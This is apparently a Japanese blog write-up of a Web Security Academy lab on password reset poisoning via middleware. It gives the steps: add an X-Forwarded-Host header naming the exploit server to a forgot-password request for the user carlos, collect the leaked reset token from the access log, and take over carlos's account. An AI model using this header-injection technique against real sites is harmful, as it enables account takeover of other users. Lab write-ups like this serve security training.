academy 認証 11問目 ミドルウェアによるパスワードリセットポイズニング

WEBセキュリティー

Lab: Password reset poisoning via middleware

My accountから、Forgot password?をクリック

wienerをいれて、submit


emailをみてと。

メールのリンクに
temp-forgot-password-token=Ttd30k8UnNnBVw1kfL5vfjL5pJ3o6mvM
というトークンがあるのを確認

POST /forgot-password をリピータに

エクスプロイトサーバーのURLを確認
https://exploit-0a19000f032deefcc03b675d011800a7.exploit-server.net/

リピータに戻って、
X-Forwarded-Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
を追加
usernameを、carlosにして send

アクセスログを確認


/forgot-password?temp-forgot-password-token=n3LsxolwKW1GrhljjJIi76vBdZeC0Cht
という行がある

メールクライアントから、パスワードリセットリンクを取得

https://0ab900ef03f1eeb1c0ec68c2004d001d.web-security-academy.net/forgot-password?temp-forgot-password-token=Ttd30k8UnNnBVw1kfL5vfjL5pJ3o6mvM

temp-forgot-password-tokenを、アクセスログに出ていたものに変更

https://0ab900ef03f1eeb1c0ec68c2004d001d.web-security-academy.net/forgot-password?temp-forgot-password-token=n3LsxolwKW1GrhljjJIi76vBdZeC0Cht

これをブラウザに張り付ける

carlosのパスワード変更画面になっている模様
パスワード変更

carlosでログイン

クリア

–)v

コメント

タイトルとURLをコピーしました